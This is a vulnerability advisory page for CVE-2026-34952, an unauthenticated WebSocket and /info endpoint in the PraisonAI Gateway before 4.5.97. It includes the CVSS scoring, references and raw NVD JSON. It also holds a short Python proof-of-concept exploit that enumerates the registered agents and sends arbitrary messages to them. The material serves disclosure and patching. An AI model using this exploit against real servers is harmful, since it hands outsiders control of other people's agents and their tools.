CVE-2026-34952

Description

PraisonAI is a multi-agent teams system. Prior to version 4.5.97, the PraisonAI Gateway server accepts WebSocket connections at /ws and serves agent topology at /info with no authentication. Any network client can connect, enumerate registered agents, and send arbitrary messages to agents and their tool sets. This issue has been patched in version 4.5.97.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI < 4.5.97

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import asyncio
import websockets
import requests
import json

TARGET_URL = "http://target-server"
WS_URL = "ws://target-server/ws"

# 1. Enumerate agents via /info
print("[*] Fetching agent topology...")
try:
    r = requests.get(f"{TARGET_URL}/info")
    if r.status_code == 200:
        agents = r.json()
        print(f"[+] Found agents: {agents}")
except Exception as e:
    print(f"[-] Error fetching info: {e}")

# 2. Connect and send arbitrary message
async def send_exploit():
    uri = WS_URL
    async with websockets.connect(uri) as websocket:
        # Construct malicious payload
        payload = {
            "agent": "target-agent-id",
            "message": "Arbitrary malicious command"
        }
        print(f"[*] Sending payload: {payload}")
        await websocket.send(json.dumps(payload))
        response = await websocket.recv()
        print(f"[+] Received response: {response}")

asyncio.get_event_loop().run_until_complete(send_exploit())

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34952
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34952
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34952/
[4] VulDB https://vuldb.com/cve/CVE-2026-34952
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g
[6] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34952", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:06.490", "lastModified": "2026-04-09T16:55:59.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.97, the PraisonAI Gateway server accepts WebSocket connections at /ws and serves agent topology at /info with no authentication. Any network client can connect, enumerate registered agents, and send arbitrary messages to agents and their tool sets. This issue has been patched in version 4.5.97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.97", "matchCriteriaId": "7525B4ED-CECC-4805-8EED-C055561A15F0"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-cfh6-vr3j-qc3g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}